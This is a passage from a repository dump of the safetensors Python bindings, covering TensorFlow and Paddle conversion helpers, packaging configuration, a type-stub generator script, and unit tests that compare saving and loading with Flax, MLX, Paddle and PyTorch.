129 | def _np2paddle(numpy_dict: Dict[str, np.ndarray], device: str = "cpu") -> Dict[str, paddle.Tensor]:
130 | for k, v in numpy_dict.items():
131 | numpy_dict[k] = paddle.to_tensor(v, place=device)
132 | return numpy_dict
133 |
134 |
135 | def _paddle2np(paddle_dict: Dict[str, paddle.Tensor]) -> Dict[str, np.array]:
136 | for k, v in paddle_dict.items():
137 | paddle_dict[k] = v.detach().cpu().numpy()
138 | return paddle_dict
139 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/py.typed:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/huggingface/safetensors/bca53e3e178b9e1279c8d32302cdbbdcd4ce4842/bindings/python/py_src/safetensors/py.typed
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/tensorflow.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Dict, Optional, Union
3 |
4 | import numpy as np
5 | import tensorflow as tf
6 |
7 | from safetensors import numpy, safe_open
8 |
9 |
10 | def save(tensors: Dict[str, tf.Tensor], metadata: Optional[Dict[str, str]] = None) -> bytes:
11 | """
12 | Saves a dictionary of tensors into raw bytes in safetensors format.
13 |
14 | Args:
15 | tensors (`Dict[str, tf.Tensor]`):
16 | The incoming tensors. Tensors need to be contiguous and dense.
17 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
18 | Optional text only metadata you might want to save in your header.
19 | For instance it can be useful to specify more about the underlying
20 | tensors. This is purely informative and does not affect tensor loading.
21 |
22 | Returns:
23 | `bytes`: The raw bytes representing the format
24 |
25 | Example:
26 |
27 | ```python
28 | from safetensors.tensorflow import save
29 | import tensorflow as tf
30 |
31 | tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))}
32 | byte_data = save(tensors)
33 | ```
34 | """
35 | np_tensors = _tf2np(tensors)
36 | return numpy.save(np_tensors, metadata=metadata)
37 |
38 |
39 | def save_file(
40 | tensors: Dict[str, tf.Tensor],
41 | filename: Union[str, os.PathLike],
42 | metadata: Optional[Dict[str, str]] = None,
43 | ) -> None:
44 | """
45 | Saves a dictionary of tensors into raw bytes in safetensors format.
46 |
47 | Args:
48 | tensors (`Dict[str, tf.Tensor]`):
49 | The incoming tensors. Tensors need to be contiguous and dense.
50 | filename (`str`, or `os.PathLike`)):
51 | The filename we're saving into.
52 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
53 | Optional text only metadata you might want to save in your header.
54 | For instance it can be useful to specify more about the underlying
55 | tensors. This is purely informative and does not affect tensor loading.
56 |
57 | Returns:
58 | `None`
59 |
60 | Example:
61 |
62 | ```python
63 | from safetensors.tensorflow import save_file
64 | import tensorflow as tf
65 |
66 | tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))}
67 | save_file(tensors, "model.safetensors")
68 | ```
69 | """
70 | np_tensors = _tf2np(tensors)
71 | return numpy.save_file(np_tensors, filename, metadata=metadata)
72 |
73 |
74 | def load(data: bytes) -> Dict[str, tf.Tensor]:
75 | """
76 | Loads a safetensors file into tensorflow format from pure bytes.
77 |
78 | Args:
79 | data (`bytes`):
80 | The content of a safetensors file
81 |
82 | Returns:
83 | `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor` on cpu
84 |
85 | Example:
86 |
87 | ```python
88 | from safetensors.tensorflow import load
89 |
90 | file_path = "./my_folder/bert.safetensors"
91 | with open(file_path, "rb") as f:
92 | data = f.read()
93 |
94 | loaded = load(data)
95 | ```
96 | """
97 | flat = numpy.load(data)
98 | return _np2tf(flat)
99 |
100 |
101 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, tf.Tensor]:
102 | """
103 | Loads a safetensors file into tensorflow format.
104 |
105 | Args:
106 | filename (`str`, or `os.PathLike`)):
107 | The name of the file which contains the tensors
108 |
109 | Returns:
110 | `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor`
111 |
112 | Example:
113 |
114 | ```python
115 | from safetensors.tensorflow import load_file
116 |
117 | file_path = "./my_folder/bert.safetensors"
118 | loaded = load_file(file_path)
119 | ```
120 | """
121 | result = {}
122 | with safe_open(filename, framework="tf") as f:
123 | for k in f.offset_keys():
124 | result[k] = f.get_tensor(k)
125 | return result
126 |
127 |
128 | def _np2tf(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, tf.Tensor]:
129 | for k, v in numpy_dict.items():
130 | numpy_dict[k] = tf.convert_to_tensor(v)
131 | return numpy_dict
132 |
133 |
134 | def _tf2np(tf_dict: Dict[str, tf.Tensor]) -> Dict[str, np.array]:
135 | for k, v in tf_dict.items():
136 | tf_dict[k] = v.numpy()
137 | return tf_dict
138 |
--------------------------------------------------------------------------------
/bindings/python/pyproject.toml:
--------------------------------------------------------------------------------
1 | [project]
2 | name = 'safetensors'
3 | requires-python = '>=3.9'
4 | authors = [
5 | {name = 'Nicolas Patry', email = 'patry.nicolas@protonmail.com'}
6 | ]
7 | classifiers = [
8 | "Development Status :: 5 - Production/Stable",
9 | "Intended Audience :: Developers",
10 | "Intended Audience :: Education",
11 | "Intended Audience :: Science/Research",
12 | "License :: OSI Approved :: Apache Software License",
13 | "Operating System :: OS Independent",
14 | "Programming Language :: Python :: 3",
15 | "Programming Language :: Python :: 3.7",
16 | "Programming Language :: Python :: 3.8",
17 | "Programming Language :: Python :: 3.9",
18 | "Programming Language :: Python :: 3.10",
19 | "Topic :: Scientific/Engineering :: Artificial Intelligence",
20 | "Typing :: Typed",
21 | ]
22 | license = { file = "LICENSE" }
23 | dynamic = [
24 | 'description',
25 | 'readme',
26 | 'version',
27 | ]
28 |
29 | [project.urls]
30 | Homepage = 'https://github.com/huggingface/safetensors'
31 | Source = 'https://github.com/huggingface/safetensors'
32 |
33 | [project.optional-dependencies]
34 | numpy = ["numpy>=1.21.6"]
35 | torch = [
36 | "safetensors[numpy]",
37 | "torch>=1.10",
38 | ]
39 | tensorflow = [
40 | "safetensors[numpy]",
41 | "tensorflow>=2.11.0",
42 | ]
43 | # pinning tf version 2.11.0 for doc-builder
44 | pinned-tf = [
45 | "safetensors[numpy]",
46 | "tensorflow==2.18.0",
47 | ]
48 | jax = [
49 | "safetensors[numpy]",
50 | "flax>=0.6.3",
51 | "jax>=0.3.25",
52 | "jaxlib>=0.3.25",
53 | ]
54 | mlx = [
55 | "mlx>=0.0.9",
56 | ]
57 | paddlepaddle = [
58 | "safetensors[numpy]",
59 | "paddlepaddle>=2.4.1",
60 | ]
61 | quality = [
62 | "black==22.3", # after updating to black 2023, also update Python version in pyproject.toml to 3.7
63 | "click==8.0.4",
64 | "isort>=5.5.4",
65 | "flake8>=3.8.3",
66 | ]
67 | testing = [
68 | "safetensors[numpy]",
69 | "h5py>=3.7.0",
70 | "huggingface_hub>=0.12.1",
71 | "setuptools_rust>=1.5.2",
72 | "pytest>=7.2.0",
73 | "pytest-benchmark>=4.0.0",
74 | # "python-afl>=0.7.3",
75 | "hypothesis>=6.70.2",
76 | ]
77 | all = [
78 | "safetensors[torch]",
79 | "safetensors[numpy]",
80 | "safetensors[pinned-tf]",
81 | "safetensors[jax]",
82 | "safetensors[paddlepaddle]",
83 | "safetensors[quality]",
84 | "safetensors[testing]",
85 | ]
86 | dev = [
87 | "safetensors[all]",
88 | ]
89 |
90 |
91 | [build-system]
92 | requires = ["maturin>=1.0,<2.0"]
93 | build-backend = "maturin"
94 |
95 | [tool.maturin]
96 | python-source = "py_src"
97 | module-name = "safetensors._safetensors_rust"
98 | bindings = 'pyo3'
99 | features = ["pyo3/extension-module"]
100 |
101 | [tool.black]
102 | line-length = 119
103 | target-version = ['py35']
104 |
105 | [tool.setuptools.dynamic]
106 | readme = {file = ["README.rst"]}
107 |
--------------------------------------------------------------------------------
/bindings/python/setup.cfg:
--------------------------------------------------------------------------------
1 | [isort]
2 | default_section = FIRSTPARTY
3 | ensure_newline_before_comments = True
4 | force_grid_wrap = 0
5 | include_trailing_comma = True
6 | known_first_party = transformers
7 | known_third_party =
8 | absl
9 | conllu
10 | datasets
11 | elasticsearch
12 | fairseq
13 | faiss-cpu
14 | fastprogress
15 | fire
16 | fugashi
17 | git
18 | h5py
19 | matplotlib
20 | nltk
21 | numpy
22 | packaging
23 | pandas
24 | PIL
25 | psutil
26 | pytest
27 | pytorch_lightning
28 | rouge_score
29 | sacrebleu
30 | seqeval
31 | sklearn
32 | streamlit
33 | tensorboardX
34 | tensorflow
35 | tensorflow_datasets
36 | timeout_decorator
37 | torch
38 | torchaudio
39 | torchtext
40 | torchvision
41 | torch_xla
42 | tqdm
43 | paddlepaddle
44 |
45 | line_length = 119
46 | lines_after_imports = 2
47 | multi_line_output = 3
48 | use_parentheses = True
49 |
50 | [flake8]
51 | ignore = E203, E501, E741, W503, W605
52 | max-line-length = 119
53 |
54 | [tool:pytest]
55 | doctest_optionflags=NUMBER NORMALIZE_WHITESPACE ELLIPSIS
--------------------------------------------------------------------------------
/bindings/python/stub.py:
--------------------------------------------------------------------------------
1 | import argparse
2 | import inspect
3 | import os
4 |
5 | import black
6 |
7 |
8 | INDENT = " " * 4
9 | GENERATED_COMMENT = "# Generated content DO NOT EDIT\n"
10 |
11 |
12 | def do_indent(text: str, indent: str):
13 | return text.replace("\n", f"\n{indent}")
14 |
15 |
16 | def function(obj, indent, text_signature=None):
17 | if text_signature is None:
18 | text_signature = obj.__text_signature__
19 | string = ""
20 | string += f"{indent}def {obj.__name__}{text_signature}:\n"
21 | indent += INDENT
22 | string += f'{indent}"""\n'
23 | string += f"{indent}{do_indent(obj.__doc__, indent)}\n"
24 | string += f'{indent}"""\n'
25 | string += f"{indent}pass\n"
26 | string += "\n"
27 | string += "\n"
28 | return string
29 |
30 |
31 | def member_sort(member):
32 | if inspect.isclass(member):
33 | value = 10 + len(inspect.getmro(member))
34 | else:
35 | value = 1
36 | return value
37 |
38 |
39 | def fn_predicate(obj):
40 | value = inspect.ismethoddescriptor(obj) or inspect.isbuiltin(obj)
41 | if value:
42 | return (
43 | obj.__doc__
44 | and obj.__text_signature__
45 | and (not obj.__name__.startswith("_") or obj.__name__ in {"__enter__", "__exit__"})
46 | )
47 | if inspect.isgetsetdescriptor(obj):
48 | return obj.__doc__ and not obj.__name__.startswith("_")
49 | return False
50 |
51 |
52 | def get_module_members(module):
53 | members = [
54 | member
55 | for name, member in inspect.getmembers(module)
56 | if not name.startswith("_") and not inspect.ismodule(member)
57 | ]
58 | members.sort(key=member_sort)
59 | return members
60 |
61 |
62 | def pyi_file(obj, indent=""):
63 | string = ""
64 | if inspect.ismodule(obj):
65 | string += GENERATED_COMMENT
66 | members = get_module_members(obj)
67 | for member in members:
68 | string += pyi_file(member, indent)
69 |
70 | elif inspect.isclass(obj):
71 | indent += INDENT
72 | mro = inspect.getmro(obj)
73 | if len(mro) > 2:
74 | inherit = f"({mro[1].__name__})"
75 | else:
76 | inherit = ""
77 | string += f"class {obj.__name__}{inherit}:\n"
78 |
79 | body = ""
80 | if obj.__doc__:
81 | body += f'{indent}"""\n{indent}{do_indent(obj.__doc__, indent)}\n{indent}"""\n'
82 |
83 | fns = inspect.getmembers(obj, fn_predicate)
84 |
85 | # Init
86 | if obj.__text_signature__:
87 | signature = obj.__text_signature__.replace("(", "(self, ")
88 | body += f"{indent}def __init__{signature}:\n"
89 | body += f"{indent+INDENT}pass\n"
90 | body += "\n"
91 |
92 | for name, fn in fns:
93 | body += pyi_file(fn, indent=indent)
94 |
95 | if not body:
96 | body += f"{indent}pass\n"
97 |
98 | string += body
99 | string += "\n\n"
100 |
101 | elif inspect.isbuiltin(obj):
102 | string += f"{indent}@staticmethod\n"
103 | string += function(obj, indent)
104 |
105 | elif inspect.ismethoddescriptor(obj):
106 | string += function(obj, indent)
107 |
108 | elif inspect.isgetsetdescriptor(obj):
109 | # TODO it would be interesing to add the setter maybe ?
110 | string += f"{indent}@property\n"
111 | string += function(obj, indent, text_signature="(self)")
112 | else:
113 | raise Exception(f"Object {obj} is not supported")
114 | return string
115 |
116 |
117 | def py_file(module, origin):
118 | members = get_module_members(module)
119 |
120 | string = GENERATED_COMMENT
121 | string += f"from .. import {origin}\n"
122 | string += "\n"
123 | for member in members:
124 | name = member.__name__
125 | string += f"{name} = {origin}.{name}\n"
126 | return string
127 |
128 |
129 | def do_black(content, is_pyi):
130 | mode = black.Mode(
131 | target_versions={black.TargetVersion.PY35},
132 | line_length=119,
133 | is_pyi=is_pyi,
134 | string_normalization=True,
135 | experimental_string_processing=False,
136 | )
137 | try:
138 | content = content.replace("$self", "self")
139 | return black.format_file_contents(content, fast=True, mode=mode)
140 | except black.NothingChanged:
141 | return content
142 |
143 |
144 | def write(module, directory, origin, check=False):
145 | submodules = [(name, member) for name, member in inspect.getmembers(module) if inspect.ismodule(member)]
146 |
147 | filename = os.path.join(directory, "__init__.pyi")
148 | pyi_content = pyi_file(module)
149 | pyi_content = do_black(pyi_content, is_pyi=True)
150 | os.makedirs(directory, exist_ok=True)
151 | if check:
152 | with open(filename, "r") as f:
153 | data = f.read()
154 | assert data == pyi_content, f"The content of {filename} seems outdated, please run `python stub.py`"
155 | else:
156 | with open(filename, "w") as f:
157 | f.write(pyi_content)
158 |
159 | filename = os.path.join(directory, "__init__.py")
160 | py_content = py_file(module, origin)
161 | py_content = do_black(py_content, is_pyi=False)
162 | os.makedirs(directory, exist_ok=True)
163 |
164 | is_auto = False
165 | if not os.path.exists(filename):
166 | is_auto = True
167 | else:
168 | with open(filename, "r") as f:
169 | line = f.readline()
170 | if line == GENERATED_COMMENT:
171 | is_auto = True
172 |
173 | if is_auto:
174 | if check:
175 | with open(filename, "r") as f:
176 | data = f.read()
177 | assert data == py_content, f"The content of {filename} seems outdated, please run `python stub.py`"
178 | else:
179 | with open(filename, "w") as f:
180 | f.write(py_content)
181 |
182 | for name, submodule in submodules:
183 | write(submodule, os.path.join(directory, name), f"{name}", check=check)
184 |
185 |
186 | if __name__ == "__main__":
187 | parser = argparse.ArgumentParser()
188 | parser.add_argument("--check", action="store_true")
189 |
190 | args = parser.parse_args()
191 | import safetensors
192 |
193 | write(
194 | safetensors._safetensors_rust,
195 | "py_src/safetensors/",
196 | "safetensors",
197 | check=args.check,
198 | )
199 |
--------------------------------------------------------------------------------
/bindings/python/tests/data/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/huggingface/safetensors/bca53e3e178b9e1279c8d32302cdbbdcd4ce4842/bindings/python/tests/data/__init__.py
--------------------------------------------------------------------------------
/bindings/python/tests/test_flax_comparison.py:
--------------------------------------------------------------------------------
1 | import platform
2 | import unittest
3 | import sys
4 |
5 |
6 | if platform.system() != "Windows":
7 | # This platform is not supported, we don't want to crash on import
8 | # This test will be skipped anyway.
9 | import jax.numpy as jnp
10 | from jax import random
11 | from flax.serialization import msgpack_restore, msgpack_serialize
12 | from safetensors import safe_open
13 | from safetensors.flax import load_file, save_file
14 |
15 |
16 | # Jax doesn't not exist on Windows
17 | @unittest.skipIf(platform.system() == "Windows", "Flax is not available on Windows")
18 | class LoadTestCase(unittest.TestCase):
19 | def setUp(self):
20 | key = random.key(0)
21 | data = {
22 | "test": random.normal(key, (1024, 1024), dtype=jnp.float32),
23 | "test2": random.normal(key, (1024, 1024), dtype=jnp.float16),
24 | "test3": random.normal(key, (1024, 1024), dtype=jnp.bfloat16),
25 | }
26 | self.flax_filename = "./tests/data/flax_load.msgpack"
27 | self.sf_filename = "./tests/data/flax_load.safetensors"
28 |
29 | serialized = msgpack_serialize(data)
30 | with open(self.flax_filename, "wb") as f:
31 | f.write(serialized)
32 |
33 | save_file(data, self.sf_filename)
34 |
35 | def test_zero_sized(self):
36 | data = {
37 | "test": jnp.zeros((2, 0), dtype=jnp.float32),
38 | }
39 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors"
40 | save_file(data.copy(), local)
41 | reloaded = load_file(local)
42 | # Empty tensor != empty tensor on numpy, so comparing shapes
43 | # instead
44 | self.assertEqual(data["test"].shape, reloaded["test"].shape)
45 |
46 | def test_deserialization_safe(self):
47 | weights = load_file(self.sf_filename)
48 |
49 | with open(self.flax_filename, "rb") as f:
50 | data = f.read()
51 | flax_weights = msgpack_restore(data)
52 |
53 | for k, v in weights.items():
54 | tv = flax_weights[k]
55 | self.assertTrue(jnp.allclose(v, tv))
56 |
57 | def test_deserialization_safe_open(self):
58 | weights = {}
59 | with safe_open(self.sf_filename, framework="flax") as f:
60 | for k in f.keys():
61 | weights[k] = f.get_tensor(k)
62 |
63 | with open(self.flax_filename, "rb") as f:
64 | data = f.read()
65 | flax_weights = msgpack_restore(data)
66 |
67 | for k, v in weights.items():
68 | tv = flax_weights[k]
69 | self.assertTrue(jnp.allclose(v, tv))
70 |
71 | def test_loading_without_ml_dtype(self):
72 | # This does not work as we cannot unload
73 | # modules, copy this into its own file to test.
74 | # https://github.com/huggingface/safetensors/issues/598
75 | sys.modules.pop("ml_dtypes", None)
76 | with safe_open(self.sf_filename, framework="flax") as f:
77 | f.get_tensor("test3")
78 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_mlx_comparison.py:
--------------------------------------------------------------------------------
1 | import platform
2 | import unittest
3 |
4 |
5 | HAS_MLX = False
6 | if platform.system() == "Darwin":
7 | # This platform is not supported, we don't want to crash on import
8 | # This test will be skipped anyway.
9 | try:
10 | import mlx.core as mx
11 |
12 | HAS_MLX = True
13 | except ImportError:
14 | pass
15 | if HAS_MLX:
16 | from safetensors import safe_open
17 | from safetensors.mlx import load_file, save_file
18 |
19 |
20 | # MLX only exists on Mac
21 | @unittest.skipIf(platform.system() != "Darwin", "Mlx is not available on non Mac")
22 | @unittest.skipIf(not HAS_MLX, "Mlx is not available.")
23 | class LoadTestCase(unittest.TestCase):
24 | def setUp(self):
25 | data = {
26 | "test": mx.randn((1024, 1024), dtype=mx.float32),
27 | "test2": mx.randn((1024, 1024), dtype=mx.float32),
28 | "test3": mx.randn((1024, 1024), dtype=mx.float32),
29 | # This doesn't work because bfloat16 is not implemented
30 | # with similar workarounds as jax/tensorflow.
31 | # https://github.com/ml-explore/mlx/issues/1296
32 | # "test4": mx.randn((1024, 1024), dtype=mx.bfloat16),
33 | }
34 | self.mlx_filename = "./tests/data/mlx_load.npz"
35 | self.sf_filename = "./tests/data/mlx_load.safetensors"
36 |
37 | mx.savez(self.mlx_filename, **data)
38 | save_file(data, self.sf_filename)
39 |
40 | def test_zero_sized(self):
41 | data = {
42 | "test": mx.zeros((2, 0), dtype=mx.float32),
43 | }
44 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors"
45 | save_file(data.copy(), local)
46 | reloaded = load_file(local)
47 | # Empty tensor != empty tensor on numpy, so comparing shapes
48 | # instead
49 | self.assertEqual(data["test"].shape, reloaded["test"].shape)
50 |
51 | def test_deserialization_safe(self):
52 | weights = load_file(self.sf_filename)
53 |
54 | mlx_weights = mx.load(self.mlx_filename)
55 |
56 | for k, v in weights.items():
57 | tv = mlx_weights[k]
58 | self.assertTrue(mx.allclose(v, tv))
59 |
60 | def test_deserialization_safe_open(self):
61 | weights = {}
62 | with safe_open(self.sf_filename, framework="mlx") as f:
63 | for k in f.keys():
64 | weights[k] = f.get_tensor(k)
65 |
66 | mlx_weights = mx.load(self.mlx_filename)
67 |
68 | for k, v in weights.items():
69 | tv = mlx_weights[k]
70 | self.assertTrue(mx.allclose(v, tv))
71 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_paddle_comparison.py:
--------------------------------------------------------------------------------
1 | import unittest
2 |
3 | import numpy as np
4 |
5 |
6 | try:
7 | import paddle
8 | from safetensors.paddle import load_file, save_file
9 |
10 | HAS_PADDLE = True
11 | except ImportError:
12 | HAS_PADDLE = False
13 |
14 |
15 | @unittest.skipIf(not HAS_PADDLE, "Paddle is not available")
16 | class SafeTestCase(unittest.TestCase):
17 | def setUp(self):
18 | data = {
19 | "test": paddle.zeros((1024, 1024), dtype=paddle.float32),
20 | "test2": paddle.zeros((1024, 1024), dtype=paddle.float32),
21 | "test3": paddle.zeros((1024, 1024), dtype=paddle.float32),
22 | }
23 | self.paddle_filename = "./tests/data/paddle_load.pdparams"
24 | self.sf_filename = "./tests/data/paddle_load.safetensors"
25 |
26 | paddle.save(data, self.paddle_filename)
27 | save_file(data, self.sf_filename)
28 |
29 | @unittest.expectedFailure
30 | def test_zero_sized(self):
31 | # This fails because paddle wants initialized tensor before
32 | # sending to numpy
33 | data = {
34 | "test": paddle.zeros((2, 0), dtype=paddle.float32),
35 | }
36 | local = "./tests/data/out_safe_paddle_mmap_small2.safetensors"
37 | save_file(data, local)
38 | reloaded = load_file(local)
39 | self.assertTrue(paddle.equal(data["test"], reloaded["test"]))
40 |
41 | def test_deserialization_safe(self):
42 | weights = load_file(self.sf_filename)
43 |
44 | paddle_weights = paddle.load(self.paddle_filename)
45 | for k, v in weights.items():
46 | tv = paddle_weights[k]
47 | self.assertTrue(np.allclose(v, tv))
48 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_pt_model.py:
--------------------------------------------------------------------------------
1 | import copy
2 | import unittest
3 |
4 | import torch
5 |
6 | from safetensors import safe_open
7 | from safetensors.torch import (
8 | _end_ptr,
9 | _find_shared_tensors,
10 | _is_complete,
11 | _remove_duplicate_names,
12 | load_model,
13 | save_file,
14 | save_model,
15 | )
16 |
17 |
18 | class OnesModel(torch.nn.Module):
19 | def __init__(self):
20 | super().__init__()
21 | self.a = torch.nn.Linear(4, 4)
22 | self.a.weight = torch.nn.Parameter(torch.ones((4, 4)))
23 | self.a.bias = torch.nn.Parameter(torch.ones((4,)))
24 | self.b = self.a
25 |
26 |
27 | class Model(torch.nn.Module):
28 | def __init__(self):
29 | super().__init__()
30 | self.a = torch.nn.Linear(100, 100)
31 | self.b = self.a
32 |
33 |
34 | class NonContiguousModel(torch.nn.Module):
35 | def __init__(self):
36 | super().__init__()
37 | self.a = torch.nn.Linear(100, 100)
38 | A = torch.zeros((100, 100))
39 | A = A.transpose(0, 1)
40 | self.a.weight = torch.nn.Parameter(A)
41 |
42 |
43 | class CopyModel(torch.nn.Module):
44 | def __init__(self):
45 | super().__init__()
46 | self.a = torch.nn.Linear(100, 100)
47 | self.b = copy.deepcopy(self.a)
48 |
49 |
50 | class NoSharedModel(torch.nn.Module):
51 | def __init__(self):
52 | super().__init__()
53 | self.a = torch.nn.Linear(100, 100)
54 | self.b = torch.nn.Linear(100, 100)
55 |
56 |
57 | class TorchModelTestCase(unittest.TestCase):
58 | def test_is_complete(self):
59 | A = torch.zeros((3, 3))
60 | self.assertTrue(_is_complete(A))
61 |
62 | B = A[:1, :]
63 | self.assertFalse(_is_complete(B))
64 |
65 | # Covers the whole storage but with holes
66 | C = A[::2, :]
67 | self.assertFalse(_is_complete(C))
68 |
69 | D = torch.zeros((2, 2), device=torch.device("meta"))
70 | self.assertTrue(_is_complete(D))
71 |
72 | def test_find_shared_tensors(self):
73 | A = torch.zeros((3, 3))
74 | B = A[:1, :]
75 |
76 | self.assertEqual(_find_shared_tensors({"A": A, "B": B}), [{"A", "B"}])
77 | self.assertEqual(_find_shared_tensors({"A": A}), [{"A"}])
78 | self.assertEqual(_find_shared_tensors({"B": B}), [{"B"}])
79 |
80 | C = torch.zeros((2, 2), device=torch.device("meta"))
81 | D = C[:1]
82 | # Meta device is not shared
83 | self.assertEqual(_find_shared_tensors({"C": C, "D": D}), [])
84 | self.assertEqual(_find_shared_tensors({"C": C}), [])
85 | self.assertEqual(_find_shared_tensors({"D": D}), [])
86 |
87 | def test_find_shared_non_shared_tensors(self):
88 | A = torch.zeros((4,))
89 | B = A[:2]
90 | C = A[2:]
91 | # Shared storage but do not overlap
92 | self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B"}, {"C"}])
93 |
94 | B = A[:2]
95 | C = A[1:]
96 | # Shared storage but *do* overlap
97 | self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B", "C"}])
98 |
99 | B = A[:2]
100 | C = A[2:]
101 | D = A[:1]
102 | # Shared storage but *do* overlap
103 | self.assertEqual(_find_shared_tensors({"B": B, "C": C, "D": D}), [{"B", "D"}, {"C"}])
104 |
105 | def test_end_ptr(self):
106 | A = torch.zeros((4,))
107 | start = A.data_ptr()
108 | end = _end_ptr(A)
109 | self.assertEqual(end - start, 16)
110 | B = torch.zeros((16,))
111 | A = B[::4]
112 | start = A.data_ptr()
113 | end = _end_ptr(A)
114 | # Jump 3 times 16 byes (the stride of B)
115 | # Then add the size of the datapoint 4 bytes
116 | self.assertEqual(end - start, 16 * 3 + 4)
117 |
118 | # FLOAT16
119 | A = torch.zeros((4,), dtype=torch.float16)
120 | start = A.data_ptr()
121 | end = _end_ptr(A)
122 | self.assertEqual(end - start, 8)
123 | B = torch.zeros((16,), dtype=torch.float16)
124 | A = B[::4]
125 | start = A.data_ptr()
126 | end = _end_ptr(A)
127 | # Jump 3 times 8 bytes (the stride of B)
128 | # Then add the size of the datapoint 4 bytes
129 | self.assertEqual(end - start, 8 * 3 + 2)
130 |
131 | def test_remove_duplicate_names(self):
132 | A = torch.zeros((3, 3))
133 | B = A[:1, :]
134 |
135 | self.assertEqual(_remove_duplicate_names({"A": A, "B": B}), {"A": ["B"]})
136 | self.assertEqual(_remove_duplicate_names({"A": A, "B": B, "C": A}), {"A": ["B", "C"]})
137 | with self.assertRaises(RuntimeError):
138 | self.assertEqual(_remove_duplicate_names({"B": B}), [])
139 |
140 | def test_failure(self):
141 | model = Model()
142 | with self.assertRaises(RuntimeError):
143 | save_file(model.state_dict(), "tmp.safetensors")
144 |
145 | # def test_workaround_refuse(self):
146 | # model = Model()
147 | # A = torch.zeros((1000, 10))
148 | # a = A[:100, :]
149 | # model.a.weight = torch.nn.Parameter(a)
150 | # with self.assertRaises(RuntimeError) as ctx:
151 | # save_model(model, "tmp4.safetensors")
152 | # self.assertIn(".Refusing to save/load the model since you could be storing much more memory than needed.", str(ctx.exception))
153 |
154 | def test_save(self):
155 | # Just testing the actual saved file to make sure we're ok on big endian
156 | model = OnesModel()
157 | save_model(model, "tmp_ones.safetensors")
158 | with safe_open("tmp_ones.safetensors", framework="pt") as f:
159 | self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"})
160 |
161 | # 192 hardcoded to skip the header, metadata order is random.
162 | self.assertEqual(
163 | open("tmp_ones.safetensors", "rb").read()[192:],
164 | b"""\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?""",
165 | )
166 |
167 | model2 = OnesModel()
168 | load_model(model2, "tmp_ones.safetensors")
169 |
170 | state_dict = model.state_dict()
171 | for k, v in model2.state_dict().items():
172 | torch.testing.assert_close(v, state_dict[k])
173 |
174 | def test_workaround(self):
175 | model = Model()
176 | save_model(model, "tmp.safetensors")
177 | with safe_open("tmp.safetensors", framework="pt") as f:
178 | self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"})
179 |
180 | model2 = Model()
181 | load_model(model2, "tmp.safetensors")
182 |
183 | state_dict = model.state_dict()
184 | for k, v in model2.state_dict().items():
185 | torch.testing.assert_close(v, state_dict[k])
186 |
187 | def test_workaround_works_with_different_on_file_names(self):
188 | model = Model()
189 | state_dict = model.state_dict()
190 | state_dict.pop("a.weight")
191 | state_dict.pop("a.bias")
192 | save_file(state_dict, "tmp.safetensors")
193 |
194 | model2 = Model()
195 | load_model(model2, "tmp.safetensors")
196 |
197 | state_dict = model.state_dict()
198 | for k, v in model2.state_dict().items():
199 | torch.testing.assert_close(v, state_dict[k])
200 |
201 | def test_workaround_non_contiguous(self):
202 | model = NonContiguousModel()
203 |
204 | with self.assertRaises(ValueError) as ctx:
205 | save_model(model, "tmp_c.safetensors", force_contiguous=False)
206 | self.assertIn("use save_model(..., force_contiguous=True)", str(ctx.exception))
207 | save_model(model, "tmp_c.safetensors", force_contiguous=True)
208 |
209 | model2 = NonContiguousModel()
210 | load_model(model2, "tmp_c.safetensors")
211 |
212 | state_dict = model.state_dict()
213 | for k, v in model2.state_dict().items():
214 | torch.testing.assert_close(v, state_dict[k])
215 |
216 | def test_workaround_copy(self):
217 | model = CopyModel()
218 | self.assertEqual(
219 | _find_shared_tensors(model.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}]
220 | )
221 | save_model(model, "tmp.safetensors")
222 |
223 | model2 = CopyModel()
224 | load_model(model2, "tmp.safetensors")
225 |
226 | state_dict = model.state_dict()
227 | for k, v in model2.state_dict().items():
228 | torch.testing.assert_close(v, state_dict[k])
229 |
230 | def test_difference_with_torch(self):
231 | model = Model()
232 | torch.save(model.state_dict(), "tmp2.bin")
233 |
234 | model2 = NoSharedModel()
235 | # This passes on torch.
236 | # The tensors are shared on disk, they are *not* shared within the model
237 | # The model happily loads the tensors, and ends up *not* sharing the tensors by.
238 | # doing copies
239 | self.assertEqual(
240 | _find_shared_tensors(model2.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}]
241 | )
242 | model2.load_state_dict(torch.load("tmp2.bin"))
243 | self.assertEqual(
244 | _find_shared_tensors(model2.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}]
245 | )
246 |
247 | # However safetensors cannot save those, so we cannot
248 | # reload the saved file with the different model
249 | save_model(model, "tmp2.safetensors")
250 | with self.assertRaises(RuntimeError) as ctx:
251 | load_model(model2, "tmp2.safetensors")
